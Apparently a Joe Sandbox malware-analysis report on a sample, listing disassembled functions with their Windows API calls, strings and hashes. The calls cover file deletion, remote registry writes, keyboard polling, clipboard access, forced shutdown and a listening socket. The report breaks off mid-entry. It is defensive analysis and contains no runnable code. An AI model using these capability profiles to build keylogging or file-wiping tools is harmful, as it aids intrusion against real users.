Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: fbdb3149def86389373eb2d600a2af849da59dc8b152567575b8a4359c7dac58
Instruction ID: 20d25596e6cc458c8fcd27bcc8f571947ab9d5c9be73c348a45df03f73a6365c
Opcode Fuzzy Hash: fbdb3149def86389373eb2d600a2af849da59dc8b152567575b8a4359c7dac58
Instruction Fuzzy Hash: 8DA120B1418204ABDB01EF64C985EBFB7ECEF95704F40491EF595CA191EB35DA08CB62

Function 003FEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003FEFB6
_wcscmp.LIBCMT ref: 003FEFCB
_wcscmp.LIBCMT ref: 003FEFE2
GetFileAttributesW.KERNEL32(?), ref: 003FEFF4
SetFileAttributesW.KERNEL32(?,?), ref: 003FF00E
FindNextFileW.KERNEL32(00000000,?), ref: 003FF026
FindClose.KERNEL32(00000000), ref: 003FF031
FindFirstFileW.KERNEL32(*.*,?), ref: 003FF04D
_wcscmp.LIBCMT ref: 003FF074
_wcscmp.LIBCMT ref: 003FF08B
SetCurrentDirectoryW.KERNEL32(?), ref: 003FF09D
SetCurrentDirectoryW.KERNEL32(00448920), ref: 003FF0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 003FF0C5
FindClose.KERNEL32(00000000), ref: 003FF0D2
FindClose.KERNEL32(00000000), ref: 003FF0E4

Strings

*.*, xrefs: 003FF048

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 063bdf8eb36953c437111969277418ad326c4b478dcae8dd7bba2fb2fbecdbb1
Instruction ID: 31bd964916d2a9495ab2c88d7bb929d7211fb0058d3c3139ead6c3f7194fb9ef
Opcode Fuzzy Hash: 063bdf8eb36953c437111969277418ad326c4b478dcae8dd7bba2fb2fbecdbb1
Instruction Fuzzy Hash: 5A31153250021E7EDB25EBB0DC48AFE77AC9F49360F1041B6EE04E21A1DF74DA45CA68

Function 00410857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00410953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0041F910,00000000,?,00000000,?,?), ref: 004109C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00410A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00410A92
RegCloseKey.ADVAPI32(?), ref: 00410DB2
RegCloseKey.ADVAPI32(00000000), ref: 00410DBF

Strings

REG_DWORD, xrefs: 00410C83
REG_QWORD, xrefs: 00410D00
REG_EXPAND_SZ, xrefs: 00410A2F
REG_SZ, xrefs: 00410AD0
REG_BINARY, xrefs: 00410D4D
REG_MULTI_SZ, xrefs: 00410B7A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 5e7b8376e042b9c092f8f3d649117088aa91de0230f80baf2d2fa6f40a788c59
Instruction ID: 5035eb81241dc65dd48f5a6a54db607b886bec322d124a5b1adca3bcb77254a7
Opcode Fuzzy Hash: 5e7b8376e042b9c092f8f3d649117088aa91de0230f80baf2d2fa6f40a788c59
Instruction Fuzzy Hash: CB027A756046019FCB15EF28C841E6AB7E5FF89314F04855EF88A9B3A2DB74EC81CB85

Function 003A66E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

LIMIT_RECURSION=, xrefs: 003E11FC
NO_START_OPT), xrefs: 003E114F
LIMIT_MATCH=, xrefs: 003E1170
CR), xrefs: 003E1287
_:, xrefs: 003E1465, 003E150C, 003E15B4
0DC, xrefs: 003A6733
3c:, xrefs: 003A68FF
BSR_UNICODE), xrefs: 003E1338
NO_AUTO_POSSESS), xrefs: 003E112E
ANY), xrefs: 003E12DE
0FC, xrefs: 003A6747
UTF), xrefs: 003E10FA
ANYCRLF), xrefs: 003E12FB
LF), xrefs: 003E12A4
UTF16), xrefs: 003E10CF
CRLF), xrefs: 003E12C1
BSR_ANYCRLF), xrefs: 003E131E
UCP), xrefs: 003E110D
0EC, xrefs: 003A673D
pGC, xrefs: 003A6751

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID:
String ID: 0DC$0EC$0FC$3c:$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGC$_:
API String ID: 0-3787263741
Opcode ID: e100d352045c593d5ed5386058ef633f63504781b08e278071429879f8fb76be
Instruction ID: 12a8dd3bf7a8d8e36a5563c97ece91aebc87a2918b9188d76a105f26f2691f17
Opcode Fuzzy Hash: e100d352045c593d5ed5386058ef633f63504781b08e278071429879f8fb76be
Instruction Fuzzy Hash: 1F7291B5E00269CBDF16CF59C8817AEB7B5FF49310F15816AE805EB690E7349D81CB90

Function 003FF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003FF113
_wcscmp.LIBCMT ref: 003FF128
_wcscmp.LIBCMT ref: 003FF13F

Part of subcall function 003F4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003F43A0

FindNextFileW.KERNEL32(00000000,?), ref: 003FF16E
FindClose.KERNEL32(00000000), ref: 003FF179
FindFirstFileW.KERNEL32(*.*,?), ref: 003FF195
_wcscmp.LIBCMT ref: 003FF1BC
_wcscmp.LIBCMT ref: 003FF1D3
SetCurrentDirectoryW.KERNEL32(?), ref: 003FF1E5
SetCurrentDirectoryW.KERNEL32(00448920), ref: 003FF203
FindNextFileW.KERNEL32(00000000,00000010), ref: 003FF20D
FindClose.KERNEL32(00000000), ref: 003FF21A
FindClose.KERNEL32(00000000), ref: 003FF22C

Strings

*.*, xrefs: 003FF190

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 0ee804cfeeb4ef68785173c4354e2ef755edf3cd94aa5c78323fba06cf570f6c
Instruction ID: 85505acccfa38367e43674c65da1c25ba4d7d4a7fddd3e7462da898076e29303
Opcode Fuzzy Hash: 0ee804cfeeb4ef68785173c4354e2ef755edf3cd94aa5c78323fba06cf570f6c
Instruction Fuzzy Hash: C031073A50061D7EDB21EFA0EC48AFE77AC9F45320F214576EE00E20A0DB30DE45CA58

Function 003FA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003FA20F
__swprintf.LIBCMT ref: 003FA231
CreateDirectoryW.KERNEL32(?,00000000), ref: 003FA26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003FA293
_memset.LIBCMT ref: 003FA2B2
_wcsncpy.LIBCMT ref: 003FA2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003FA323
CloseHandle.KERNEL32(00000000), ref: 003FA32E
RemoveDirectoryW.KERNEL32(?), ref: 003FA337
CloseHandle.KERNEL32(00000000), ref: 003FA341

Strings

:, xrefs: 003FA252
\, xrefs: 003FA247
\??\%s, xrefs: 003FA22B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: e433f7e9ba5c8e02e619c3b6cb5c31db7cc7b34e4a836f7dca8908d6bd9878ed
Instruction ID: 0fa0284e701fa883bcf403d049472d778913998902541557f4beee3d1d589393
Opcode Fuzzy Hash: e433f7e9ba5c8e02e619c3b6cb5c31db7cc7b34e4a836f7dca8908d6bd9878ed
Instruction Fuzzy Hash: 2931A3B5500109ABDB22DFA0DC49FFB77BCEF89744F1041B6FA08D6160EB7096458B25

Function 003F001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 003F0097
SetKeyboardState.USER32(?), ref: 003F0102
GetAsyncKeyState.USER32(000000A0), ref: 003F0122
GetKeyState.USER32(000000A0), ref: 003F0139
GetAsyncKeyState.USER32(000000A1), ref: 003F0168
GetKeyState.USER32(000000A1), ref: 003F0179
GetAsyncKeyState.USER32(00000011), ref: 003F01A5
GetKeyState.USER32(00000011), ref: 003F01B3
GetAsyncKeyState.USER32(00000012), ref: 003F01DC
GetKeyState.USER32(00000012), ref: 003F01EA
GetAsyncKeyState.USER32(0000005B), ref: 003F0213
GetKeyState.USER32(0000005B), ref: 003F0221

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 19997f84b02bead45384573b2ee039d6904fe723d8c88d4ecccffb5287db8777
Instruction ID: 77257b756a11dc4d43e6c1d055871046a32d089711d04a4498703a5fb0035c5c
Opcode Fuzzy Hash: 19997f84b02bead45384573b2ee039d6904fe723d8c88d4ecccffb5287db8777
Instruction Fuzzy Hash: 9A510C3490478D29FB3ADBB889547FABFB49F01380F09459EC6C15A1C3DAA49B8CC761

Function 004103DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040FDAD,?,?), ref: 00410E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004104AC

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0041054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004105E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00410822
RegCloseKey.ADVAPI32(00000000), ref: 0041082F

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: f0cf52f620ee6c7ac983596803349e455424dbbfb5954ef3c956010cf378feb7
Instruction ID: f5c2d98489b141bc1b6a95e89c615f3f985da51523d1628b264820147204c220
Opcode Fuzzy Hash: f0cf52f620ee6c7ac983596803349e455424dbbfb5954ef3c956010cf378feb7
Instruction Fuzzy Hash: 64E15F31204200AFCB15DF28C891E6BBBE5EF89314F04856EF44ADB2A1D774ED85CB96

Function 00404164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0040418B
EmptyClipboard.USER32 ref: 00404191
GlobalAlloc.KERNEL32(00000002,?), ref: 004041A6
CloseClipboard.USER32 ref: 00404245

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: c184ddb5d1a5115ecc55e56605ca6fc306788d9e5de645813b4ed07a3076a357
Instruction ID: 2388c6e64bad949467ab3429022c4a4138604d931acf8960b0490518898f29bf
Opcode Fuzzy Hash: c184ddb5d1a5115ecc55e56605ca6fc306788d9e5de645813b4ed07a3076a357
Instruction Fuzzy Hash: 9721A3753002109FDB11AF64DC09BAE7BA8EF45751F10807AFA46DB2A1DB74AC02CB59

Function 003F37EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770

Part of subcall function 003F4A31: GetFileAttributesW.KERNEL32(?,003F370B), ref: 003F4A32

FindFirstFileW.KERNEL32(?,?), ref: 003F38A3
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003F394B
MoveFileW.KERNEL32(?,?), ref: 003F395E
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003F397B
FindNextFileW.KERNEL32(00000000,00000010), ref: 003F399D
FindClose.KERNEL32(00000000,?,?,?,?), ref: 003F39B9

Strings

\*.*, xrefs: 003F384E, 003F3857, 003F386C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 96253b28d4ee3a53700df2d04a32ddb3e135353a8d2c2a9328878357a545e8d7
Instruction ID: 34cb56738aab180e788e6208a76d54b19dcd6160bebb266e27903fa23038e9c8
Opcode Fuzzy Hash: 96253b28d4ee3a53700df2d04a32ddb3e135353a8d2c2a9328878357a545e8d7
Instruction Fuzzy Hash: 5651503180514DAACF17EBA0D9929FEB779AF15300F604069E506BB191EF716F0DCB61

Function 003FF3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003FF440
Sleep.KERNEL32(0000000A), ref: 003FF470
_wcscmp.LIBCMT ref: 003FF484
_wcscmp.LIBCMT ref: 003FF49F
FindNextFileW.KERNEL32(?,?), ref: 003FF53D
FindClose.KERNEL32(00000000), ref: 003FF553

Strings

*.*, xrefs: 003FF425

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 179952ca6a55abfaaffe5de58555cd963f97a2e21fe0ad73515c28e24eb29c70
Instruction ID: d60a2b9d6ac15cc62f252061b1a1e1b48f68c5af92ad966a069c2c7dbd29e251
Opcode Fuzzy Hash: 179952ca6a55abfaaffe5de58555cd963f97a2e21fe0ad73515c28e24eb29c70
Instruction Fuzzy Hash: A8417B7190021EAFDF16EF64CC45AFEBBB8FF05310F144466E919A6291EB309A89CF50

Function 003A3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON

Download Yara Rule

Strings

_:, xrefs: 003A3322
3c:, xrefs: 003A3225

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __itow__swprintf
String ID: 3c:$_:
API String ID: 674341424-3871541621
Opcode ID: b6e698c3bdffcdafbf229f5fe5e13c72d5e274e1264bfdb17d3341e9bc69aa20
Instruction ID: 311202cc1bdeece4b3c98beb2e7fa353a4bffc78bc1213ae10c47ecc5d1677aa
Opcode Fuzzy Hash: b6e698c3bdffcdafbf229f5fe5e13c72d5e274e1264bfdb17d3341e9bc69aa20
Instruction Fuzzy Hash: 33228D716083009FCB26DF14D882BAEB7E8EF89714F14491DF59A9B391DB71E904CB92

Function 003A5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003A58A5
_memmove.LIBCMT ref: 003A58F5
_memmove.LIBCMT ref: 003A595B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 35c6be6d85a8e67badef642e92787ed9c8579c348018ecbb36234fb076f90887
Instruction ID: b41c925552a035a775839e7a177e03d8cae360b5a549b195a50d497886416532
Opcode Fuzzy Hash: 35c6be6d85a8e67badef642e92787ed9c8579c348018ecbb36234fb076f90887
Instruction Fuzzy Hash: BB127B70A00619DFDF0ADFA5D981AEEB7B5FF49300F104629E846EB290EB35AD51CB50

Function 003F3B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770

Part of subcall function 003F4A31: GetFileAttributesW.KERNEL32(?,003F370B), ref: 003F4A32

FindFirstFileW.KERNEL32(?,?), ref: 003F3B89
DeleteFileW.KERNEL32(?,?,?,?), ref: 003F3BD9
FindNextFileW.KERNEL32(00000000,00000010), ref: 003F3BEA
FindClose.KERNEL32(00000000), ref: 003F3C01
FindClose.KERNEL32(00000000), ref: 003F3C0A

Strings

\*.*, xrefs: 003F3B5B

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 584359fa384cb2902a152989eccfe35a3a5d081594bd3d60daaeaf27187cf8e8
Instruction ID: d3d528471259980b7bc3eb425fa0011bf0d5d8964b9435dcb5c0c12ce2a0d62e
Opcode Fuzzy Hash: 584359fa384cb2902a152989eccfe35a3a5d081594bd3d60daaeaf27187cf8e8
Instruction Fuzzy Hash: B93180310193899BC702EF64C8958FFB7A8AE91304F404D2DF4D5961A1EB21DA0DCB67

Function 003F51BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 003E87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003E882B
Part of subcall function 003E87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003E8858
Part of subcall function 003E87E1: GetLastError.KERNEL32 ref: 003E8865

ExitWindowsEx.USER32(?,00000000), ref: 003F51F9

Strings

, xrefs: 003F51E7
@, xrefs: 003F51EC
SeShutdownPrivilege, xrefs: 003F51C9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: b4f3ae205d8c48f2952ac99a4f2500ea5589fefbdc8f312212d0d33b77c9280e
Instruction ID: 0bd37497a9b3cf735d155fbdc507012f02456878a9776efb4c2e504e135d2409
Opcode Fuzzy Hash: b4f3ae205d8c48f2952ac99a4f2500ea5589fefbdc8f312212d0d33b77c9280e
Instruction Fuzzy Hash: FC012B31B91A1D7BF72A63689C9BFBB725CEB05340F210E35FB07E64D2DA615C018594

Function 00406283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004062DC
WSAGetLastError.WSOCK32(00000000), ref: 004062EB
bind.WSOCK32(00000000,?,00000010), ref: 00406307
listen.WSOCK32(00000000,00000005), ref: 00406316
WSAGetLastError.WSOCK32(00000000), ref: 00406330
closesocket.WSOCK32(00000000,00000000), ref: 00406344

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
